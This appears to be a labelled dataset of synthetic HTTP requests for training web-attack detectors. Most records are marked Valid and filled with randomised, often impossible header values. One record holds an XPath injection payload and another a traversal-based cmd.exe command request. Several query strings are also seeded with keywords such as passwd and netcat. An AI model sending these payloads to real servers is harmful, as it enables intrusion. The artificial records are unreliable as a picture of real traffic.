Proxy-Authorization: nsaea Rbis=Iad6tiRh
Authorization: xebpi psootru9=tgnsEm9
Range: -183900,9-,-702
Referer: http://rooiin.biz/eklwvss/ndiqtahi/lroh.wav
TE: gzip,trailers
Trailer: Host
User-Agent: Mozilla/9.8 (compatible; MSIE 0.7; Win98; spnjdsmdc; oslbifsyvw)
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 853x924
Via: FTP/9.8 49.156.101.61
Transfer-Encoding: identity
Upgrade: oisn/4.4, aeped/8.6, u7N/3.2, stbaT/1.1, tXahe/2.3
Warning: 570 www.nsr0yb.tiff "idriDs5TTt7N" "Tue, 07 Oct 08 06:25:56 CET"
X-Forwarded-For: 130.40.193.83
X-Serial-Number: 234338027352713339
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

atbr7ro6Oe5Sx1a=0xaNdpeoinwr&srtzs=prdtsa eejuiJg;nclon

End - Id: 32668
Start - Id: 32160
class: Valid
GET /mtzgKu_d7fVUMjlaQw7N.cgi? HTTP/1.0
Host: www.itndo2gpiu.ch
Connection: close
Accept: */*
Accept-Charset: big5;q=0.9, iso-2022-jp;q=0.9, x-mac-chinesetrad;q=0.6, iso-8859-5;q=0.4
Accept-Encoding: *
Accept-Language: dse-uahw0t, aOkndIcs-boydmelx;q=0.1, szyda-nghytrid;q=0.2, ew-ftrE;q=0.8
Cache-Control: max-age=0
Client-ip: 225.25.216.125
Cookie: neonsx5i3heaet=fsidn
Cookie2: $Version="79"
Date: Mon, 24 Jul 06 06:42:08 UTC
ETag: "qd-Ko9LoIq2ZVIYAhXwI"
Expect: 100-continue
From: nysnc@tRhdi.ch
If-Modified-Since: Wed, 12 Apr 06 03:25:36 GMT
If-Unmodified-Since: Thu, 03 May 07 23:29:36 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Jan 07 24:10:20 CET
Max-Forwards: 25
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest nc=3A5E1cB7
Authorization: Basic cmFkcDpFdmF1YWJkbw==
Range: 55063-6304,280-5,006-574457
Referer: http://hwgtGwc.de/o9tsr.wav
TE: chunked
Trailer: Referer
User-Agent: Mozilla/9.8 (Windows; U; Windows NT 7.3; vr-db; rv:8.0.7) Gecko/52888508
UA-CPU: Sparc
UA-Disp: 3488,5746,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 320x815
Via: 3.2 www.sv9h.jpeg, 1.3 www.turntlr.jpg:900
Transfer-Encoding: deflate
Upgrade: agy/0.3
Warning: 953 85.108.253.61 "sa7gxeiapkth" 
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 30016266128
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32160
Start - Id: 3846
class: Valid
GET /km4etB2glNSMhtpasst6.bin?ntvd=44380&usle=Ld6eu+tenfsB&W6urUncn1=748303483&OWvuoeAle4cIl=573563096&ttu=m%3AnE&ira=lunni&Wlocationitmp=15582050&sE=tp6o-&uettl3ro=65&nYxp_oXGJ=5o+b&gvbrdpjL09shutdown=26&owfhetu9o=Ye8en4&UhEFOV=%27it%27hynsa0Nhu%3Da&nlnsamat=1yjrgrmenieny2n HTTP/1.0
Host: www.4re5wit.com
Connection: keep-alive
Accept: video/quicktime, application/*, video/quicktime
Accept-Charset: hz-gb-2312;q=0.1, euc-cn
Accept-Encoding: 
Accept-Language: cehs-dths;q=0.1, Lre1xhsB-tofeoleh;q=0.7, aydD-tretiw, dss-nur
Cache-Control: max-stale
Client-ip: 192.184.71.53
Cookie: aoiWUz=i<;me=>eyrm;mererlenDneesa=priemTezied
Cookie2: $Version="105"
Date: Thu, 27 Sep 07 21:32:10 CET
ETag: W/"PKrfLJ6Gsklhj61ds"
Expect: nbebn1wt=a6eje
From: N8otdyin@xnevet.de
If-Modified-Since: Thu, 11 Oct 07 19:52:21 GMT
If-Unmodified-Since: Mon, 08 Mar 04 05:52:46 GMT
If-Match: *
If-None-Match: "SBxc9LnmAID5wyzABb"
If-Range: Sun, 03 Dec 06 03:57:16 CET
Max-Forwards: 224
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: zoctyi 7aisneR=e096hns
Authorization: NTLM dGVlSmlpckR3NG9zbnNUaWFlYWFpOXdudG5vN25tbHJtaGxPSTlpRmU=
Range: 706-48,3-8712,-3
Referer: http://www.n9loncEo.st/nejoOsw/feoEeyot/asreRcu.conf
TE: chunked,trailers,trailers
User-Agent: Mozilla/5.7 (compatible; kia1n; Unix; DsaeehTnr; asdntl)
UA-CPU: 68000
UA-Disp: 9985,6519,16
UA-OS: Win95
UA-Color: color32
Via: mmonx/3.3 www.neob.jpeg
Transfer-Encoding: gzip
Upgrade: eeyd/1.5, nTs9te/2.1, tdqnc/6.5
Warning: 584 www.iahsed.jpg "oi5d" "Wed, 25 Jul 07 08:26:14 GMT"
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3846
Start - Id: 22467
class: Valid
GET /S4wAaymail5scriptEtZ0/A114_Z8HC/e@Lea.swf?UAMXvxnl=yZ_BZrPt_OIj&svl=admin&dul9So6rea=8350&rebeedg=0588291&uo=f+6%7C+ HTTP/1.1
Host: www.oRde.net:80
Connection: t3hetei
Accept: video/*
Accept-Charset: x-mac-chinesesimp;q=0.9
Accept-Encoding: 
Accept-Language: i-dr;q=0.4, fomdrt-tsl;q=0.2, e-to3e, ltiat6-ie6u
Cache-Control: no-store
Client-ip: 143.55.74.84
Cookie: digtnhn3o=33066778;ett8tc=1O._zW8;elueSattulEhh=@isOqlpr
Cookie2: $Version="71"
Date: Sat, 21 Aug 04 20:36:21 UTC
ETag: "dLE7ZOoe9aEGcBFNFt"
Expect: 100-continue
From: oh5chbe@53nslitm.fr
If-Modified-Since: Sat, 08 Apr 06 12:46:29 CET
If-Unmodified-Since: Mon, 17 May 04 17:06:09 GMT
If-Match: "DDWTcUdgKNsbj1fk"
If-None-Match: *
If-Range: Tue, 02 Sep 08 05:02:53 UTC
Max-Forwards: 660
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest nc=7cFCaf64
Authorization: lEjeuo sdifl=e6rluon
Range: -3,89-398798
Referer: /eSepdor/cersvfi/dvidit/e2yhfnrx/hhOs9Sc.jsp
TE: trailers
Trailer: Upgrade
User-Agent: rvetT4K http://www.uiocaskh.it
UA-CPU: Sparc
UA-Disp: 392,629,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 060x3759
Via: 7.2 221.99.43.73, 6.4 73.81.80.51, 8.6 www.te4ei.js:53493
Transfer-Encoding: compress
Upgrade: bah/4.7, 7rv/7.5
Warning: 862 www.ol7W.htm "eRrAglLe" "Wed, 27 Apr 05 03:00:04 CET"
X-Forwarded-For: 10.200.53.236
X-Serial-Number: 5826747890581
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22467
Start - Id: 30684
class: Valid
GET /2b16195vdJ.php4?1KT9d=fT++schildt&iqoefmupsuzthL=30&0igfdd=rE7bH&hse5caDyKr=auujde&rf9ir=eoL%2Fpa&PWU4=laEiweiblnps&ec3idudE0th=wep&hss=7735767&Nok3lt6e=4erwcopyalio HTTP/1.0
Host: 87.138.96.125
Connection: tosu
Accept: audio/*;q=0.1, video/mpeg;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-age=636
Client-ip: 3.252.148.167
Cookie: surna=57338599;tWpobpeIrM=skssk%;Yz-L41Qv.=wr2ucoqfuwIvd3;5w7oiEeT0ionN=E|nxm>;febqvnope=msohaving2u
Cookie2: $Version="5"
Date: Wed, 06 Oct 04 09:38:30 UTC
ETag: W/"idZlBWo-xsm14qrtIs"
Expect: Selo0dy=sc1LteA
From: aeec@eeAs.fr
If-Modified-Since: Mon, 26 Jul 04 16:13:29 GMT
If-Unmodified-Since: Fri, 23 Sep 05 10:04:14 GMT
If-Match: "sdX6m8_IsZAlrlYpUw"
If-None-Match: *
If-Range: *
Max-Forwards: 222
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM NTdudWg3Ym5obGFlMFR2ZWliaXNhYWR0NHR4NTRhcnNvSXRhbw==
Authorization: Basic eWVuc2ZlaW86aXVkWXRzbw==
Range: 174-63482
Referer: /es5e.swf
TE: trailers,trailers,deflate
Trailer: Accept-Language
User-Agent: iwfNilc http://www.y8iabw.org
UA-CPU: MIPS
UA-Disp: 9503,087,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7462x1873
Via: 8.9 7.244.61.105, FTP/4.5 www.boaI.jpeg, HTTP/6.6 187.224.114.237
Transfer-Encoding: TaeotE; a6ve=Uyinisn
Upgrade: nrr/7.3, ssae/3.9, Uaehed/6.1
Warning: 212 www.aeeaeyio.jpg "iorto9Sgs" "Wed, 05 Nov 08 05:06:08 GMT"
X-Forwarded-For: 90.32.42.192
X-Serial-Number: 62673072943112918
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30684
Start - Id: 23866
class: Valid
GET /pmT1OD/eBOhP/dTofhtap9rtdhoe/rdciEetieo8p/iwFmR1oGwYu.5YsjPjka/nrtir7BeseierBet2/Jhxdiv/a4vw4XcOJusrhV5.js?ksock_streamJ1.-i=027865&ciaWtEufrn2O=0&wherenxRyN7ulogX=+0d0rIt%28o%3Aao+t&onrnb=4819952&zaU1k4boot.ini=440&so6gei=1314&ymJ59passwdy5=ec24.uPNs&jemoo7yh=44736&0zZznetcat3j.oBll=tlEV&lt7enomur=hrnosmwrRts8tsra&la=082617 HTTP/1.0
Host: 247.29.175.162
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: yktdcEr-dncle
Cache-Control: only-if-cached
Client-ip: 246.48.151.143
Cookie: OOowheremN=1;Ni2=pnah;eir=odn;erhoR=is4O=a;PZpcW1KWV=answestnh;eoobrefVmi4ie=ai8
Cookie2: $Version="0"
Date: Sat, 12 Jan 08 10:49:25 UTC
ETag: W/"Gb8eTEjVMnzP_op."
Expect: ojuyOn2=oeatvV;rNHree4m=xeirtd
From: r0dm@twn4oe.uk
If-Modified-Since: Wed, 29 Apr 09 02:59:38 CET
If-Unmodified-Since: Sat, 03 Apr 10 05:05:58 CET
If-Match: *
If-None-Match: "RD4oO0wocop-6ICU"
If-Range: Sun, 21 Feb 10 23:37:12 GMT
Max-Forwards: 458
MIME-Version: 1.5
Pragma: enoM=srnThh
Proxy-Authorization: ree1 RTnsdpfs=hElt
Authorization: NTLM YWVzYmFhdnROUkllYXpub1NlaGpobW9kcmVlaGlvb1FpZWVn
Range: -9873
Referer: /eieec.jsp
TE: trailers,trailers,deflate;q=0.9
Trailer: Connection
User-Agent: Mozilla/1.5 (Windows; U; Windows NT 1.0; is-th; rv:7.6.7) Gecko/73595439
UA-CPU: MIPS
UA-Disp: 420,768,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1738x3451
Via: 5.3 158.211.232.214, FTP/3.9 www.tibt.css
Transfer-Encoding: deii
Upgrade: ulgz9r/5.4, a8ll/8.6, KSaees/8.7
Warning: 011 156.147.40.52 "rdo9insd0rnm5isiuwim" "Sat, 18 Sep 04 21:23:03 CET"
X-Forwarded-For: 17.40.114.14
X-Serial-Number: 6817355934
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23866
Start - Id: 49899
class: XPathInjection
GET /XEFu/sq.@PUOjt4J5QWcWx./aoucesltoa/l6z-24pUhJN/hneeNm6elnfptthsdn/nti/yeOte2dmsihg4nnetl/l5rJxpWW_yfm.1nD/e3ya9h1l8h23SiDowag.tiff?tm7D=aVPIeNGbu3&8ieeyoxitnzl=s%5Dr&unKhN3OLLHRk=2cphltrdej8Nad&nAel8htdu=tL9I1d&8era8ouSeoctes=update4eeltOll%3Dra&6eaatAbr=etbewhint&zk=2066558&vJQyQfromGob.Bb=oyVBIrzkMrde&amhbes=25&trygtw=nh0AJ&ipeRnjkdaw=c5nfzlrge4thsttxp&d0t9svMoEhOnN=nfjMI&nj8u=929664&Ak0kn=rE&oas=4++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++++81491%3D HTTP/1.1
Host: 213.1.98.179:883
Connection: close
Accept: */*;q=0.1
Accept-Charset: euc-jp;q=0.0, iso-8859-1;q=0.6
Accept-Encoding: *
Accept-Language: a-6;q=0.4, uul-t, gdTitiio-e8a3azd1;q=0.2
Cache-Control: max-age=17679
Client-ip: 20.51.109.18
Cookie: heaiel=947632;eTtshwr4n7mnn=h08;ejhMee5=sDbj ;teNKoNKq=\ dmhbes;adh=9;cbmgitfcEnoy7e=Dhi
Cookie2: $Version="310"
Date: Mon, 13 Feb 06 11:02:07 CET
ETag: "jMycFfwb78DBxCYj2-.i"
Expect: 100-continue
From: t9xyb@dtrmz.gov
If-Modified-Since: Wed, 23 Jun 04 22:59:53 CET
If-Unmodified-Since: Sun, 14 Sep 08 04:41:05 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 771
MIME-Version: 6.4
Pragma: neetrl='alonm'
Proxy-Authorization: NTLM T2RhYW5lcnJobG1DcjVhZHJucjdlaGFwaWlzY21vM2V0Z3Ju
Authorization: NTLM Y3g3MXZxRHRwZmFEaGVQZGVvbmVlZWRkaXU2bmluY2Fkb2gzZWRyZW4=
Range: 794-
Referer: http://www.enqc.cz/onomra/hhot6le0/llmrMoh.sh
TE: deflate
Trailer: User-Agent
User-Agent: soeyexvtgocrt
UA-CPU: PowerPC
UA-Disp: 2831,824,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9591x1965
Via: 5.9 11.61.213.70:45602, 9.7 www.hdrMwlui.gif, 7.9 220.129.159.234
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 883 www.oeedEt.gif "90sw81n3tnalV" 
X-Forwarded-For: 49.36.115.120
X-Serial-Number: 87544886060
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49899
Start - Id: 26898
class: Valid
GET /owieze8s/as3iodason/rreNAEyku/wsock_streamDNY-lQ4E/YallGit%uHNDBmiframeD/Et1heogi.jpeg?Ncohnl=mriVGhttpslrr+uteiframeiframeb HTTP/1.1
Host: www.oRnr.com:147
Connection: close
Accept: audio/x-wav
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=2
Client-ip: 78.144.191.50
Cookie: Xuyj4YjS1=45;e4eye=tlcfartt4uFni6E;egl2tl=connectk giT=;iesdrh=ktpNLi
Cookie2: $Version="22"
Date: Tue, 10 Jun 08 08:44:16 GMT
ETag: "FHruSA7J4GkPoDT"
Expect: 100-continue
From: clW7Lgm@txs4tae.gov
If-Modified-Since: Sat, 23 Feb 08 13:08:04 GMT
If-Unmodified-Since: Thu, 21 Feb 08 23:25:53 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 13 May 05 04:03:50 UTC
Max-Forwards: 8
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: r2458w gcrmd3=dsee
Authorization: Basic bmFlb205OnNhdHRzbg==
Range: 0-,7-80207
Referer: http://www.eaudt.uk/rd1jm3/8scvNae.ace
TE: gzip;q=0.3,trailers,trailers
Trailer: Via
User-Agent: Mozilla/7.6 (Windows; U; Win 9x 9.0; tj-ds; rv:7.9.9) Gecko/45235234
UA-CPU: Sparc
UA-Disp: 0480,6767,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0290x1154
Via: FTP/4.6 www.d0odStt.png
Transfer-Encoding: nosi
Upgrade: bsetmw/7.7
Warning: 785 139.199.253.164:9 "stduoo4mei" "Wed, 12 Dec 07 02:11:19 CET"
X-Forwarded-For: 202.36.161.97
X-Serial-Number: 7606285950640498
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26898
Start - Id: 44314
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 141.255.93.219
Connection: close
Accept: audio/x-wav, image/*, audio/*
Accept-Charset: *;q=0.7
Accept-Encoding: identity, gzip, identity, compress;q=0.5, gzip;q=0.6
Accept-Language: ebchzO-a;q=0.6
Cache-Control: eageL='ca8ehpo'
Client-ip: 204.83.156.147
Cookie: 4o@scripthtpassgt=mtmewl%rsdocumentd;nbUn=aestbd)vnodeti~o;htqaieieVhdbaaN=+e;es=S6Leh2Sairsaanddndh;lbgftr=hxOee;iib=~otsy 
Cookie2: $Version="30"
Date: Fri, 22 Feb 08 24:40:19 UTC
ETag: "8n0SdKaafzTrTySu-@"
Expect: 100-continue
From: T8dcgstj@o3Utp.fr
If-Modified-Since: Sun, 17 Jun 07 17:22:25 GMT
If-Unmodified-Since: Sun, 07 Sep 08 02:29:31 UTC
If-Match: "CCiEzafJ6.IYM8u"
If-None-Match: "lwb5.bJassLthE5BqRF"
If-Range: *
Max-Forwards: 752
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest nc=47dBd7FC
Authorization: Basic ZXI4YWY6ZUVubm44
Range: -2
Referer: http://stHg3hwt.ch/rjOrihb/5zdCNaVc.jpg
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.5 (Machintosh; U; PPC 3.8; ne-ds; rv:6.6.6) Gecko/71758772
UA-CPU: MIPS
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5984x276
Via: apeOl/9.9 www.edtlncmS.js
Transfer-Encoding: gzip
Upgrade: ott9i/7.1, tei/4.6
Warning: 284 www.natmB.jpeg:92644 "Hmt9" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 44314
Start - Id: 20739
class: Valid
GET /dnb8oicirtditta/exw@JJqjFOS/tYeaElhmzoHheerqI9/5n9lstdcd7atie/pzXw5Lgroup byW0afRz./ctUqNW2d/_cmdiGlLlDhm/Y-ELWB7Fshutdown9gGKM/tUqi4fFLu9R/UA-ZsPu/uvo.6f8YO8/tW9Tw2KkfNBB.shtml?rdrGany4MqrkOdg=gVSB09A-R&ltZtiaHipyers=8&ialfm3=hOetqeieiueksR&8ela=hUuzmtgtcyyae&reies=1228454&plcshr=r.mAO1&tnTd=251245387&iczttale=96&ionmhnhdImGtee=e&2sfaa=55536479&miaU80=ed HTTP/1.0
Host: 118.0.161.214:55
Connection: keep-alive
Accept: image/jpeg, image/gif, audio/basic
Accept-Charset: x-mac-greek, x-mac-turkish, windows-1258;q=0.8, x-mac-ce;q=0.3
Accept-Encoding: *
Accept-Language: sdeo0ys-7dtlik, asrg-ther2;q=0.1
Cache-Control: max-stale=1531
Client-ip: 152.95.254.90
Cookie: umNU=r 
Cookie2: $Version="7"
Date: Wed, 13 Feb 08 24:07:57 GMT
ETag: "1DgOo2vdxETCOqChv"
Expect: 100-continue
From: edarepsn@mOihgon.org
If-Modified-Since: Tue, 18 Mar 08 13:18:39 UTC
If-Unmodified-Since: Mon, 20 Jul 09 24:44:13 UTC
If-Match: "RpFvRhLV9J@ix1O7"
If-None-Match: *
If-Range: Thu, 04 May 06 06:09:25 UTC
Max-Forwards: 38
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: 3ihsg eeptsi=olSth
Authorization: oM0rio lA2het=ihmi1irx
Range: -497842,992988-5164
Referer: http://5oe2r4.de/kxIfsty/eaReyUea.js
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.7 (compatible; oyfoht; Linux i586; qycasmidta; irnoqeom; tgloylRawe)
UA-CPU: MIPS
UA-Disp: 2316,870,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 413x553
Via: FTP/2.2 11.85.27.221
Transfer-Encoding: identity
Upgrade: log/9.9, neIir/5.4
Warning: 537 www.aR5leIta.jpeg "ihr8JStafcceegi" "Sun, 12 Sep 04 17:41:00 CET"
X-Forwarded-For: 148.116.239.129
X-Serial-Number: 43053635016402500046
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20739
Start - Id: 1384
class: Valid
GET /w5HjSw63I/8ko8/mo3wHBU2YE5gR4axnqdw/nthanfSdltnzy0/bqghYk2RzN4C.W/tAPbSn/rp1oL1Dz-znkFP1n4x/htYxuetyir/rn71keeidnrfcqtea/n.tFdGk-A0BQ5W.asmx?libaqTQl0s=59233010&lsobjectVxdinsertT=730&ctobo5leOlm=e3q8kLTR9op&SlaGW002htacceskn=v&0allUTCRC=Eeth%5C+t&tVhFaz=en&lOgha=kie7einxqoei5iel&s2e=dsgdeudt&us75tmpBoPkrcpEa=02549&we666msaiEoi=t%7Eyn6afoe&ysanne=8&iber9ozef=36818748&x0bmeda08btfd=Su%5Cri&ter0rrFqi=%7ESqandeleteeeOioeinput%28sock_stream&chrH0rT=+ HTTP/1.0
Host: 106.152.74.229:80
Connection: close
Accept: text/*;q=0.2, image/gif, application/postscript;q=0.8
Accept-Charset: x-mac-ce;q=0.3, cp-950, shift_jis;q=0.8, cp-950;q=0.6, x-mac-hebrew;q=0.8
Accept-Encoding: deflate;q=0.9, gzip, gzip;q=0.4, gzip, gzip;q=0.6
Accept-Language: m5-sdgi;q=0.4
Cache-Control: no-transform
Client-ip: 101.98.76.123
Cookie: rfody3Q1=85517646;jtEodurri=rswUe;Th1Lrrsnc6b=oat7pWoEihF;olsmles=rtleg9seiicsatl3st;ycz26rT=teuo5echooae5chtpassnurhrd s
Cookie2: $Version="0"
Date: Sat, 14 Nov 09 10:43:17 UTC
ETag: W/"NLDDHcD.qj9@50a1FAQw"
Expect: eohpaI
From: 35iGi@atmru1aewn.net
If-Modified-Since: Mon, 18 Jul 05 02:33:33 GMT
If-Unmodified-Since: Fri, 23 May 08 13:41:11 CET
If-Match: *
If-None-Match: "krm-@in@X8nG8yITgj"
If-Range: *
Max-Forwards: 27
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: peo1 et1n=eacseu
Authorization: Digest algorithm=bi8s3a
Range: 24-
Referer: /tnrbtr/l9ae/toec/u4dpeE.mpeg
TE: trailers,trailers,chunked
Trailer: From
User-Agent: iwtgac (82sKhWn; iYqNqib; ahb7M..)
UA-CPU: 68000
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 238x900
Via: 2.2 6.10.163.116, 3.0 89.135.54.102, FTP/4.4 www.s2nn.css
Transfer-Encoding: gzip
Upgrade: rc0t/5.9, Dryoo/4.4, rgtOis/7.1
Warning: 832 12.107.153.6 "o9em3ihrbeRs" 
X-Forwarded-For: 123.28.90.45
X-Serial-Number: 5490878161111
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1384
Start - Id: 23843
class: Valid
GET /xh2xxkZcnMUF7/sr/mTFkrMMO6TZ1R4V/sJMQ/mm/e448PSSpzjTFa@S3/eEeeeiEieltprzgehh6/anm7/llsbgsoundlUssciz.cgi? HTTP/1.1
Host: 229.170.214.115:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.5, gzip;q=0.9, deflate
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 158.198.144.188
Cookie: geitOi=eYoestechild4e;dtfawhtrpMsa=mo1s2rxnTq8j>t0 ;epoy8tni2=rNnsI
Cookie2: $Version="6"
Date: Sat, 25 Mar 06 12:21:50 GMT
ETag: "TuRdTw-hBPfWNyzx"
Expect: f7t2=uhanHl
From: iaaodun@atohoee.uk
If-Modified-Since: Tue, 29 May 07 20:00:05 GMT
If-Unmodified-Since: Wed, 14 Jan 09 02:38:22 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 01 Feb 06 03:00:49 CET
Max-Forwards: 147
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: s5S43 3arSouon=nibqr
Authorization: Digest cnonce="w4n7b"
Range: 7-,630558-
Referer: http://www.tdsaa.ch/srs9/wssar/ihot/mmeom/ee0un9.swf
TE: chunked,trailers
Trailer: From
User-Agent: tjJbHF http://www.mtwdon.com
UA-CPU: PowerPC
UA-Disp: 5960,788,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1738x3451
Via: 2.5 www.sOatu.html
Transfer-Encoding: deflate
Upgrade: odi/2.0
Warning: 295 www.crcst0oT.png "dusoeoAdhnzaeht4at" "Mon, 07 Sep 09 24:26:21 UTC"
X-Forwarded-For: 223.106.91.27
X-Serial-Number: 119652447524751
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23843
Start - Id: 10203
class: Valid
GET /kNRIdlLqc9/vODy9dUG9ThcopyeV3.css?axbedAt=cassubhcseHh&a-VrYQw.replace=6C8sedB6a2ei&tiy=fsamni%3Aol3oa+i%25tIl&ajsT2nence=7184066&_FlPR=eeuvO%28lmoia%2Fy%27&4zmDoidzp4e=046862&hmeyhwylnougmE=essCkt+%3Cpautoexecolaisijsn&ptituAUMnwtc=lMekEgAmb2&ftpTTAEr=Ntmy&oaero1neeoei=5eyr51y7auA&lhhOOlkre8r=aog67Nzm1&hBiMtthktdEh=36&xirazwh1had=tiOSTI2&n6snetcatETwhD=pe%2FbqskSushutdown%3F%2Bh HTTP/1.0
Host: 182.44.121.69
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 217.101.27.185
Cookie: suesjEuobt=<tHdu0lAservicesy;ehelhzrictiRd=24
Cookie2: $Version="79"
Date: Wed, 14 Apr 04 14:10:22 GMT
ETag: "Div0-MtcnHnCyom9avp@"
Expect: hlcehgHe=cThiawDn
From: ufeeti@ieeinuty.it
If-Modified-Since: Thu, 25 Dec 08 10:35:04 CET
If-Unmodified-Since: Sun, 23 Nov 08 22:16:12 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Feb 10 23:16:57 CET
Max-Forwards: 30
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest realm
Range: 740-9444,-64,-396973
Referer: http://a7o4R0T.gov/1nrrof/nte1/uet4Nehi.jpg
TE: trailers
Trailer: Pragma
User-Agent: iehaE (sUdbHS3A; tNgJP5O; dzpF8fq; rAxCDcJA; a-Fh-KVdbR)
UA-CPU: MIPS
UA-Disp: 6635,0350,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 099x017
Via: 9aiS/7.2 www.Niri.png, 7.1 42.21.139.3, 6dh7l4/7.5 www.gdcn1i.css
Transfer-Encoding: identity
Upgrade: ce2fw/5.5
Warning: 637 www.hs6E.png "t1aojshwaSSaeBsobih" "Fri, 24 Jun 05 14:32:42 CET"
X-Forwarded-For: 119.252.21.3
X-Serial-Number: 9799950017867099
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 10203
Start - Id: 17907
class: Valid
GET /roeaWa6e1t/am/njW/1EtunfiEsvyoniYl/fesfPnegvlZkuVPNFnQ/v0m.FAuZ/_nw/ne.php3? HTTP/1.1
Host: www.jogOupRm.gov
Connection: keep-alive
Accept: image/jpeg;q=0.2
Accept-Charset: windows-1253, ks_c_5601-1987;q=0.3, us-ascii, x-mac-ce
Accept-Encoding: identity;q=0.3
Accept-Language: Ene0-tuel;q=0.9, 5c3e-euc
Cache-Control: no-cache
Client-ip: 130.124.72.217
Cookie: rotieedgElemi=32898
Cookie2: $Version="54"
Date: Fri, 21 Oct 05 10:17:09 UTC
ETag: "h12ujEyqvkDJWYIHD0b"
Expect: shernS8
From: rdny@hctpuostk.cz
If-Modified-Since: Sun, 06 Nov 05 15:02:03 CET
If-Unmodified-Since: Fri, 16 May 08 17:31:31 CET
If-Match: *
If-None-Match: *
If-Range: "n14TQ6fy-3TkIRl3IBU"
Max-Forwards: 8641
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic b2VvaTdvOnA0OHN0dHY0
Authorization: NTLM ZWNzU2F3dHRzU3dyZWF0ZXFuZTFkc3ZlZWxpaWV6ZWx1c3dhN241bg==
Range: -299
Referer: /haAa/hiaf3.html
TE: deflate
Trailer: Max-Forwards
User-Agent: hoGZbLr_L http://www.etsimd.cz
UA-CPU: Sparc
UA-Disp: 427,601,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 523x1389
Via: 7.0 www.p11is.html:76, FTP/6.8 www.ueqae.gif:25551, FTP/6.8 187.222.197.209:150
Transfer-Encoding: identity
Upgrade: tigP/7.0
Warning: 425 www.7ai0u.htm "aMsyjsy" "Sat, 10 Nov 07 15:16:56 GMT"
X-Forwarded-For: 188.200.228.132
X-Serial-Number: 292499274657
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17907
Start - Id: 305
class: Valid
